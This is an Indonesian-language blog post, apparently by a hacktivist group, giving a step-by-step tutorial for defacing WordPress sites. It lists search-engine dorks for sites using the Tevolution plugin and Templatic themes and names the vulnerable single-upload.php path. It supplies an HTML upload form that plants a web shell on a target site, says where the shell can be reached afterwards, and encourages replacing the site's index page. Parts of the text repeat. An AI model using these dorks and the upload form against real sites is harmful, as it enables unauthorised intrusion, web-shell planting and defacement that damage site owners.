Langsung Sadja Simak Tutorialnya !!!
Dork : inurl:"/wp-content/plugins/Tevolution/"
inurl:/tevolution/
inurl:/wp-content/themes/Villa-Rental/
inurl:/wp-content/themes/VacationRental/
inurl:/wp-content/themes/supreme/
inurl:/wp-content/themes/5Star/
inurl:/wp-content/themes/Directory/
inurl:/wp-content/themes/HotelBooking/
inurl:/wp-content/themes/Restaurante/ inurl:/listingcategory/
inurl:/room_category/
inurl:/wp-content/plugins/Templatic-Booking/
inurl:/listings/
inurl:/listingtags/
inurl:/wp-content/plugins/Booking-Calendar/ /wp-content/plugins/akismet /wp-content/plugins/post-types-order/
inurl:/wp-content/plugins/Booking-Calendar/ /wp-content/plugins/akismet /wp-content/plugins/post-types-order/
( Lebih DiKembangin Lagi Dorknya Dengan Otak Cerdasmu ^_^ )
1.Dorking Di Search Engine
2. pilih salah satu web target yg pengen ente Crotz :V , lalu masukan exploitnya.
3. exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
1.Dorking Di Search Engine
2. pilih salah satu web target yg pengen ente Crotz :V , lalu masukan exploitnya.
3. exploit: /[path]/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Vulnerability > Blank
Kumpulkan
dulu semua target yang vuln, kalo sudah banyak waktunya proses Tanem Jagung ( Tanem Shell ) menggunakan CSRF!
CSRF:
<form
action="http://target.coli ( Tanget Yang Mau DiDeface )/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
Simpan CSRF Dengan File Ekstensi .html
Ketika Sudah Di Save , Buka File CSRF Tevolution Tadi
CSRF:
<form
action="http://target.coli ( Tanget Yang Mau DiDeface )/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>
Simpan CSRF Dengan File Ekstensi .html
Ketika Sudah Di Save , Buka File CSRF Tevolution Tadi
Lalu Buka File CSRF nya , Klik Browse Lalu Pilih Shell Kalian
Lalu Klik Crotz :V
Jika Berhasil Maka Ada Baccan ["shellmu.php"]
Tinggal Akses Shell Kalian
http://www.site.coli/wp-content/themes/Directory/images/tmp/namashellkamu.php
Jika Masuk Berarti Udah Sukses And Done :V
Jika Mau tebas Index Harap Harus Ada Backup nya atau newfile index.html
. Harap Jangan Sabun Massal Jika Kalian Dapat site ( Jangan Rusak ) !!!
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar cuk.
bila ada kritik atau pertanyaan langsung aja cuk ke FP kami The Hacktivist team
Saya cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula Kaya Saya :V
Happy Deface For WordPress !!
Sekian dan semoga bermanfaat , Thank You :*
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar cuk.
bila ada kritik atau pertanyaan langsung aja cuk ke FP kami The Hacktivist team
Saya cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula Kaya Saya :V
Happy Deface For WordPress !!
Sekian dan semoga bermanfaat , Thank You :*
![[NEWS] Situs Kabupaten Pandeglang Diretas](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRw8akpkI3oRKHMJfWPjKpwA-tt8WHGeSPZQeATMewdujU_mZWZd7-GYJ_xgln7iRlpgbb2ICQ67yxxIk4YtaQGpY8RMU86fsfkww8FoArMHPU0LZIbVA7wvfIFlPZ6y0XEsg77ivMhwg/s72-c/dwqdqqqwd.png)
Hello, Saya Pandu
No comments:
Post a Comment